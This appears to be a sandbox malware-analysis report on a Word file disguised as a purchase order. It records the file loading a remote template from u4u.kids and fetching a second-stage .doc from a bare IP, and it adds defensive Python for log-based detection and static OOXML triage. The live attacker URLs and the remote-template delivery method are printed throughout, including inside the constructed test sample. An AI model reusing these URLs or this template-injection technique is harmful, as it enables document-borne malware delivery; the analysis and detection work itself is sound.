Windows Analysis Report
PO NAHK22012FA000000.docx

Overview

General Information

Sample name: PO NAHK22012FA000000.docx
Analysis ID: 1540372
MD5: 48dd0e8d2647a5d093f64f186dcac877
SHA1: 258650076b605d2d46984016ad2986e7e41b6b9e
SHA256: e24a47e78d936fa0738d80c11910fbdf8d90d384c7584c355d56a94252323f16

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Microsoft Office launches external ms-search protocol handler (WebDAV)
Contains an external reference to another file
Office viewer loads remote template
Document misses a certain OLE stream usually present in this Microsoft Office document type
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: global traffic DNS query: name: u4u.kids (7 identical entries)
Source: global traffic TCP traffic (outbound packets, per connection):
    192.168.2.22:49164 -> 24.199.88.84:443    12
    192.168.2.22:49165 -> 24.199.88.84:443     9
    192.168.2.22:49166 -> 24.199.88.84:443     8
    192.168.2.22:49167 -> 24.199.88.84:443     8
    192.168.2.22:49168 -> 24.199.88.84:443     7
    192.168.2.22:49169 -> 24.199.88.84:443    10
    192.168.2.22:49170 -> 62.151.179.85:80     1
Source: global traffic TCP traffic (packets per connection, client -> server / server -> client):
    192.168.2.22:49164 <-> 24.199.88.84:443    12 / 9
    192.168.2.22:49165 <-> 24.199.88.84:443     9 / 10
    192.168.2.22:49166 <-> 24.199.88.84:443     8 / 9
    192.168.2.22:49167 <-> 24.199.88.84:443     8 / 9
    192.168.2.22:49168 <-> 24.199.88.84:443     7 / 7
    192.168.2.22:49169 <-> 24.199.88.84:443     9 / 8
    192.168.2.22:49170 <-> 62.151.179.85:80     5 / 4
Source: Joe Sandbox View ASN Name: TWC-12271-NYCUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic HTTP traffic detected:
    GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: u4u.kids
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 62.151.179.85
    Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 62.151.179.85 (5 identical entries)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE9AD520-4EB5-4337-9147-8A3BC8A776F2}.tmp
Source: global traffic HTTP traffic detected:
    GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: u4u.kids
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: 62.151.179.85
    Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: u4u.kids
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 23 Oct 2024 15:50:13 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 144
    Connection: close
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    Content-Security-Policy: default-src 'none'
Source: global traffic HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx/1.18.0 (Ubuntu)
    Date: Wed, 23 Oct 2024 15:50:14 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 144
    Connection: close
    X-DNS-Prefetch-Control: off
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=15552000; includeSubDomains
    X-Download-Options: noopen
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    Content-Security-Policy: default-src 'none'
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engine Classification label: mal56.evad.winDOCX@1/16@7/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$ NAHK22012FA000000.docx
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR894B.tmp
Source: PO NAHK22012FA000000.docx OLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docx OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr OLE indicator, Word Document stream: true
Source: PO NAHK22012FA000000.docx OLE document summary: title field not present or empty
Source: PO NAHK22012FA000000.docx OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: PO NAHK22012FA000000.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\PO NAHK22012FA000000.docx
Source: Window Recorder Window detected: More than 3 window changes detected
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/media/image3.emf
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/media/image2.emf
Source: PO NAHK22012FA000000.docx Initial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/embeddings/Microsoft_Excel_Worksheet1.xlsx
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/embeddings/oleObject2.bin
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/media/image2.emf
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/media/image3.emf
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: PO NAHK22012FA000000.docx Initial sample: OLE indicators vbamacros = False
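The network evidence above has a shape worth detecting outside the sandbox: WINWORD.EXE (recognisable by the "ms-office; MSOffice 14" suffix in the user agent) fetches from a domain it has no reason to contact, then pulls a .doc from a bare IP address that never appeared in a DNS query. The following is an added example in the spirit of the "Suspicious Office Outbound Connections" Sigma hit; it is not the Sigma rule and not Joe Sandbox code. The log lines are constructed from the two GET requests in the report plus two benign lines; the log format, the expected-destination allowlist and the scoring are assumptions. Note that the HTTPS request is only visible in this form behind a TLS-inspecting proxy (the sandbox decrypted it for the report).

```python
"""Flag Office-originated web requests to unexpected hosts, scored by the
signals this report shows: bare-IP host, no DNS resolution, document download.
Added example, not the Sigma rule and not Joe Sandbox code."""
import ipaddress
import re
from urllib.parse import urlsplit

OFFICE_UA = re.compile(r"\bms-office\b|\bMSOffice \d+", re.I)
DOC_EXT = (".doc", ".dot", ".docx", ".docm", ".dotx", ".dotm", ".rtf")
# Assumed allowlist: destinations an Office client legitimately contacts.
EXPECTED_OFFICE_DOMAINS = ("microsoft.com", "office.com", "office.net", "live.com")
# Constructed: names that appeared in DNS answers during the same window.
RESOLVED_HOSTS = {"u4u.kids", "officecdn.microsoft.com"}
# User agent copied from the report's requests.
OFFICE_UA_STRING = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; "
                    ".NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
                    "Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)")
# Constructed log; format assumed: <timestamp> <client> <method> <url> "<user-agent>"
SAMPLE_LOG = "\n".join([
    '2024-10-23T15:50:13Z 192.168.2.22 GET https://u4u.kids/rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament "' + OFFICE_UA_STRING + '"',
    '2024-10-23T15:50:14Z 192.168.2.22 GET http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc "' + OFFICE_UA_STRING + '"',
    '2024-10-23T15:50:20Z 192.168.2.22 GET https://officecdn.microsoft.com/pr/ "' + OFFICE_UA_STRING + '"',
    '2024-10-23T15:50:21Z 192.168.2.22 GET https://u4u.kids/ "Mozilla/5.0 (Windows NT 6.1; Win64; x64) Firefox/131.0"',
])
LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def is_ip_literal(host: str) -> bool:
    """True for hosts written as an IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def in_domains(host: str, domains) -> bool:
    """Exact or subdomain match against an allowlist of registrable domains."""
    return any(host == d or host.endswith("." + d) for d in domains)


def analyze(log_text: str, resolved_hosts=RESOLVED_HOSTS, expected=EXPECTED_OFFICE_DOMAINS) -> list:
    """One finding per Office-originated request to an unexpected host, in log
    order, with the reasons that make up its score."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line: skip it rather than abort the batch
        parts = urlsplit(m["url"])
        host = (parts.hostname or "").lower()
        if not OFFICE_UA.search(m["ua"]) or in_domains(host, expected):
            continue  # not an Office client, or an expected Office destination
        reasons = ["office-user-agent", "unexpected-destination"]
        if is_ip_literal(host):
            reasons.append("bare-ip-host")       # the report's "without corresponding DNS query"
        elif host not in resolved_hosts:
            reasons.append("no-dns-resolution")  # name never answered by the resolver we log
        if parts.path.lower().endswith(DOC_EXT):
            reasons.append("document-download")  # remote template or second-stage document
        findings.append({"ts": m["ts"], "client": m["client"], "host": host,
                         "url": m["url"], "reasons": reasons, "score": len(reasons)})
    return findings


if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["client"]} -> {hit["host"]} score={hit["score"]} {",".join(hit["reasons"])}')
```

Run against the constructed log, the u4u.kids template fetch scores 2 (Office client, unexpected destination) and the 62.151.179.85 .doc fetch scores 4; the Office request to officecdn.microsoft.com and the Firefox request to u4u.kids produce no finding, which is the point of keying on the client rather than on the destination alone.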

Persistence and Installation Behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRoot
Source: settings.xml.rels Extracted files from sample: https://u4u.kids/rxbtfa?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (67 identical entries)
Source: PO NAHK22012FA000000.docx Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRD0000.tmp.0.dr Stream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.dr Stream path '_1791189376/CONTENTS' entropy: 7.98640213683 (max. 8.0)
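Two of the indicators in this section can be recovered from the file alone, before it is ever opened: the external relationship in word/_rels/settings.xml.rels (the remote template target that made WINWORD.EXE open the u4u.kids@SSL\DavWWWRoot WebDAV path and send the HTTP GET above) and the embedded OLE 'CONTENTS' stream with an entropy of 7.986 bits per byte, close to the 8.0 maximum that encrypted or packed data reaches. The following is an added example of that static triage; it is not Joe Sandbox or oletools code. The sample .docx is built in memory: the template URL is the one extracted in the report, while the other package parts, the pseudo-random stand-in for the opaque embedding and the 7.9-bit threshold are assumptions.

```python
"""Static triage of an OOXML package: list every TargetMode="External"
relationship, single out remote attachedTemplate targets, and flag embedded
objects with near-maximal entropy. Added example, not Joe Sandbox code."""
import io
import math
import random
import re
import zipfile
import xml.etree.ElementTree as ET
from collections import Counter
from xml.sax.saxutils import escape

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Template URL as extracted in the report (the sandbox lowercases the path).
REMOTE_TEMPLATE_URL = ("https://u4u.kids/rxbtfa?&gamma-ray=angry&polo=arrogant&smog=earsplitting"
                       "&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament")
# Targets Word resolves outside the package: URLs and UNC paths.
REMOTE_TARGET = re.compile(r"^(?:https?://|file://|\\\\)", re.I)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the maximum (uniform, i.e. random or encrypted)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def external_relationships(docx_bytes: bytes) -> list:
    """(rels part, relationship type, target) for every relationship marked
    TargetMode="External" in any .rels part of the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{PKG_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target", "")))
    return found


def triage(docx_bytes: bytes, entropy_threshold: float = 7.9) -> dict:
    """Combine the relationship and entropy indicators into one verdict."""
    rels = external_relationships(docx_bytes)
    remote_templates = [t for _part, rtype, t in rels
                        if rtype == "attachedTemplate" and REMOTE_TARGET.match(t)]
    high_entropy = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if name.startswith("word/embeddings/") and \
                    shannon_entropy(pkg.read(name)) >= entropy_threshold:
                high_entropy.append(name)
    return {"external_relationships": rels,
            "remote_templates": remote_templates,
            "high_entropy_parts": high_entropy,
            "suspicious": bool(remote_templates) or bool(high_entropy)}


def build_sample_docx() -> bytes:
    """Constructed sample, not the analysed file: the smallest package that
    reproduces the settings.xml.rels indicator plus one opaque embedding
    (seeded pseudo-random bytes stand in for an encrypted payload)."""
    rng = random.Random(1)
    opaque = bytes(rng.getrandbits(8) for _ in range(32768))
    parts = {
        "[Content_Types].xml": '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "word/document.xml": f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>',
        "word/settings.xml": f'<w:settings xmlns:w="{W_NS}" xmlns:r="{REL_NS}"><w:attachedTemplate r:id="rId1"/></w:settings>',
        "word/_rels/settings.xml.rels": (
            f'<Relationships xmlns="{PKG_NS}">'
            f'<Relationship Id="rId1" Type="{REL_NS}/attachedTemplate" '
            f'Target="{escape(REMOTE_TEMPLATE_URL)}" TargetMode="External"/>'
            '</Relationships>'),
        "word/embeddings/oleObject1.bin": b"\x00" * 4096,  # low entropy, must not be flagged
        "word/embeddings/oleObject2.bin": opaque,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        for name, body in parts.items():
            pkg.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    result = triage(build_sample_docx())
    for part, rtype, target in result["external_relationships"]:
        print(f"{part}: {rtype} -> {target}")
    print("high-entropy embeddings:", result["high_entropy_parts"])
    print("suspicious:", result["suspicious"])
```

The relationship walk covers every .rels part, not only settings.xml.rels, because the same TargetMode="External" mechanism appears in footer, header and oleObject relationships (this sample also carries word/_rels/footer2.xml.rels and word/embeddings/oleObject2.bin). The entropy test is a heuristic: compressed images also score high, so it is a reason to look at an embedding, not a verdict on its own.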